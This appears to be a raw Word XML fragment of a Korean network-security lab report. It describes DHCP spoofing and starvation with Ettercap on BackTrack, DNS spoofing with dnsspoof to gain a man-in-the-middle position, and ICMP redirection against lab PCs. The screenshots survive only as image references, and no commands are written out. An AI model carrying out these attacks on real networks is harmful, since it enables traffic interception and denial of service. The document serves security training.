          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하고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 xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에서</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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현황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확인했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때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경영기획부</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC [10.10.20.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으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로그인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되었다는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것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수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있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HCP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr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38400" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="그림 54" descr="https://lh3.googleusercontent.com/6gBx0Cq-oeY7pDTccrf213OP4liW-cD3G7wMOgWn5-hW7t3HbQ56CvzxnHjcdfVJBDBASdcfzmA5bzUEgWw_ZoD-YXuGxrKxZ6q3dFgryhv72VnhKAzoYKmi7Y7x51CRaVXieW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6gBx0Cq-oeY7pDTccrf213OP4liW-cD3G7wMOgWn5-hW7t3HbQ56CvzxnHjcdfVJBDBASdcfzmA5bzUEgWw_ZoD-YXuGxrKxZ6q3dFgryhv72VnhKAzoYKmi7Y7x51CRaVXieWBw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70760" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="그림 55" descr="https://lh5.googleusercontent.com/njcg_wXnSd59scWeMaIZMrH2oLNfVsC_yJ5fW0AbFag-wvyYzAXNWfoKALLvQugmtFMjwso5W0lFGiCE1f6tt3doDOlnd9HPK9JZ9GYXETPFe-rwNpZuLRkwUrYIk5z3Hv9GFK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njcg_wXnSd59scWeMaIZMrH2oLNfVsC_yJ5fW0AbFag-wvyYzAXNWfoKALLvQugmtFMjwso5W0lFGiCE1f6tt3doDOlnd9HPK9JZ9GYXETPFe-rwNpZuLRkwUrYIk5z3Hv9GFKQ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9321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>경영기획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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC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DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서비스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용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제대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할당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받아오는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확인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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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공격자가</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT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ettercap </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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용해</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP Spoofing </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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시도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453640" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="56" name="그림 56" descr="https://lh5.googleusercontent.com/Bk0iY5Xdqx8eGHWgmt2EC1DU0FtmlOmTFiuzSD3dWjXN_FYG7e6bNWORsEYR5CuzR9EHsxUsMqkep568MqJvs2AgblpTse62SUOVINHRJ6yg36mK4vEPkmELW1gqLUIimJZy47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Bk0iY5Xdqx8eGHWgmt2EC1DU0FtmlOmTFiuzSD3dWjXN_FYG7e6bNWORsEYR5CuzR9EHsxUsMqkep568MqJvs2AgblpTse62SUOVINHRJ6yg36mK4vEPkmELW1gqLUIimJZy47gz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85060" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="그림 57" descr="https://lh5.googleusercontent.com/4PoVPNYIZmwVFGcGoAi8-N-Gs02EB0IX55ioJqcpXMAd_bkXN4GIW7RfUx9iKqx1JhyEj-_1iX64EO9zgZxBxiZRx1uO6Pa_Ux5iMYKhXjB5265e1uzGqCXaai9P84vnVU5jWG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4PoVPNYIZmwVFGcGoAi8-N-Gs02EB0IX55ioJqcpXMAd_bkXN4GIW7RfUx9iKqx1JhyEj-_1iX64EO9zgZxBxiZRx1uO6Pa_Ux5iMYKhXjB5265e1uzGqCXaai9P84vnVU5jWGyQ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9321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격대상</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC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DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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용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할당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받으면</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT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설정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대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받아오는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것을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수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있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRPr="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HCP Starvation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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77440" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="58" name="그림 58" descr="https://lh6.googleusercontent.com/nDA4VS0tlengFDF9AklQlw3C5u_vfi5EIOESKhVnxXbFxPRpP1cE4qiGBQ3YwhDQDvwqrw2yQ9cWGZX8ir2tNaFFF45np7J6ETPj_Elh3cJzMYwOdeeVmjoJLyo6PQwpRI6A2G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nDA4VS0tlengFDF9AklQlw3C5u_vfi5EIOESKhVnxXbFxPRpP1cE4qiGBQ3YwhDQDvwqrw2yQ9cWGZX8ir2tNaFFF45np7J6ETPj_Elh3cJzMYwOdeeVmjoJLyo6PQwpRI6A2Gkr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249680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="59" name="그림 59" descr="https://lh3.googleusercontent.com/h3QSfxnMrZXUV2JpIdF-1Dnt7hRCWBMH0Hj1XA-bRBGJM_Kzsn8NV6dGwgQwh2mG37D3Wbc2JM6pPZhVgko_sRWWu5_Lb9ogcWhs9vlPydycZl9-iuNZPh4533Fl-TN9ETlfm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h3QSfxnMrZXUV2JpIdF-1Dnt7hRCWBMH0Hj1XA-bRBGJM_Kzsn8NV6dGwgQwh2mG37D3Wbc2JM6pPZhVgko_sRWWu5_Lb9ogcWhs9vlPydycZl9-iuNZPh4533Fl-TN9ETlfmiR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공격</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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뒤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할당범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재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설정</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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하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BT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Ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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이용해서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에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시도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4808220" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="그림 60" descr="https://lh4.googleusercontent.com/Sm27uZX8s5X7y5Z6R_gnKgG--jchBCxqZ4p8ugTzfxd13Mv0r4aFZE9UtmrHuJq_BqXH-8ow-WygP2nG4C_0hc_pWV7VjJHNWk7r2C3a6ghSv5xOuCDcLrW4E5If3pXuChFedj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Sm27uZX8s5X7y5Z6R_gnKgG--jchBCxqZ4p8ugTzfxd13Mv0r4aFZE9UtmrHuJq_BqXH-8ow-WygP2nG4C_0hc_pWV7VjJHNWk7r2C3a6ghSv5xOuCDcLrW4E5If3pXuChFedjew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BT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공격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내용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시</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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가지고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있는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.20.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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외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나머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주소들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할당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받</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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온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것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수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있음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415540" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="61" name="그림 61" descr="https://lh5.googleusercontent.com/qDIE1dbskY1YPh-lUF9e6vNlBCMN0NHG_YZH_AMa7SNGTUoV1TbrM6Qs4kzzChV70xXYeBp1XxV-FzAnyTiBV7G9GzbflUmLy_7X7qijlbyy2mwkqiEu4MlHBak22-vrTuhvt_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qDIE1dbskY1YPh-lUF9e6vNlBCMN0NHG_YZH_AMa7SNGTUoV1TbrM6Qs4kzzChV70xXYeBp1XxV-FzAnyTiBV7G9GzbflUmLy_7X7qijlbyy2mwkqiEu4MlHBak22-vrTuhvt_g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438400" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="62" name="그림 62" descr="https://lh4.googleusercontent.com/75k8sVtbKLnrmAvVqOxpKiur8g59TWdsYGmcoRagNBAg1e7TfAKbClVTvsqJo3X09RHUvX6RD30CD5Rxsw0Eicofmux4uL8_SvoREUf-Ybpy57ASF1llvDsq_6TiJb0kQSz19g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75k8sVtbKLnrmAvVqOxpKiur8g59TWdsYGmcoRagNBAg1e7TfAKbClVTvsqJo3X09RHUvX6RD30CD5Rxsw0Eicofmux4uL8_SvoREUf-Ybpy57ASF1llvDsq_6TiJb0kQSz19g-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9321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로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동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할당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내역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확인</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>한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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>뒤</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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XP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에게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할당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받아보지만</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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더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이상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할당하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못해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아이피를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받아오지</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NS Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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69820" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="63" name="그림 63" descr="https://lh5.googleusercontent.com/24W6epkiJodqRANH1Hz9TIrjIetv6rNZpKIx7V973GnpI-F4x2jE8VzzzOqFJ448Tl0jfoXY5jzHGS2ceekmcBvW0LHpwTU7gfLWZLxVQ_gt9wMm0pOkKDzhHLjKNYZ6k4Bu-Zf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24W6epkiJodqRANH1Hz9TIrjIetv6rNZpKIx7V973GnpI-F4x2jE8VzzzOqFJ448Tl0jfoXY5jzHGS2ceekmcBvW0LHpwTU7gfLWZLxVQ_gt9wMm0pOkKDzhHLjKNYZ6k4Bu-Zfn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39340" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="64" name="그림 64" descr="https://lh6.googleusercontent.com/OF4X6maiCaYL13D7a2d6xLiRi4JN3XIgp8eyvAGOqvRFdKBHffD6RTMovYfRmEj7dvTFuaUNz_z-y8FcLdsNG82IMaJH0eNln1EDJWnJPDJxURvVEDabhU3WKQJj4IxxI8RAcn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OF4X6maiCaYL13D7a2d6xLiRi4JN3XIgp8eyvAGOqvRFdKBHffD6RTMovYfRmEj7dvTFuaUNz_z-y8FcLdsNG82IMaJH0eNln1EDJWnJPDJxURvVEDabhU3WKQJj4IxxI8RAcn3w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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Spoofing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>공격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위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파일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생성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>을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</w:rPr>
        <w:t>하고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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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대상으로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상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만들기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423160" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="65" name="그림 65" descr="https://lh3.googleusercontent.com/-zZ3UYP8DGGAIJuONDESQZ8UDpnf8qH88-loCetD9BdWykTOCs1KdkfO7iGJue5pDpmt4FQRuuIngLlSJ-i-BJmokaQtjSzI9ohrpIymYXjBtMvhcQclrsx_jzFpJRor5h6ddW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-zZ3UYP8DGGAIJuONDESQZ8UDpnf8qH88-loCetD9BdWykTOCs1KdkfO7iGJue5pDpmt4FQRuuIngLlSJ-i-BJmokaQtjSzI9ohrpIymYXjBtMvhcQclrsx_jzFpJRor5h6ddW8n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3" w:rsidRPr="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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 xml:space="preserve">dnsspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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이용해</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS Spoofing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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400300" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="66" name="그림 66" descr="https://lh6.googleusercontent.com/TxcxpzT3S17BOKQmE-ADVg8NPpojhwCmj34ieuKn85bOBSKcU3OfOiBMh3ramUUG29KHeNJ6LhrrH0I8kLIba8zJiAQG917VV3RRTrSS_mV8kVYYKwhxoWsvlgFy91mVu2L5be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TxcxpzT3S17BOKQmE-ADVg8NPpojhwCmj34ieuKn85bOBSKcU3OfOiBMh3ramUUG29KHeNJ6LhrrH0I8kLIba8zJiAQG917VV3RRTrSS_mV8kVYYKwhxoWsvlgFy91mVu2L5bel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369820" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="그림 67" descr="https://lh4.googleusercontent.com/PwcCfJ4MEzk13goVgaLp7t1_6L8AbhMzalOKb57J05WqJsy3u7KvmH8iLZu51Sw00dBTKsUg3C_NPnqVC0zHA-QsONh0q_DJeimid5EShxdEuludFdqXaIjz4aBcIdjLkZ7F4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4.googleusercontent.com/PwcCfJ4MEzk13goVgaLp7t1_6L8AbhMzalOKb57J05WqJsy3u7KvmH8iLZu51Sw00dBTKsUg3C_NPnqVC0zHA-QsONh0q_DJeimid5EShxdEuludFdqXaIjz4aBcIdjLkZ7F4RAT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Pr="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:pStyle w:val="a4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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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가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이루어졌는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BT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진행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내용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</w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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0404FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="000404FC">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CMP Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRPr="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:pStyle w:val="a4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방향 전환 요청이 꺼져있을 경우</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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53310" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="889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0. 반향 전환 요청이 꺼져있을 때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436" cy="11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54580" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="69" name="그림 69" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzND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yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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공격대상의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 가서 방화벽 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">설정에 방향 전환 요청에 체크가 되어 있는지 확인 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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>
            <wp:extent cx="2331720" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
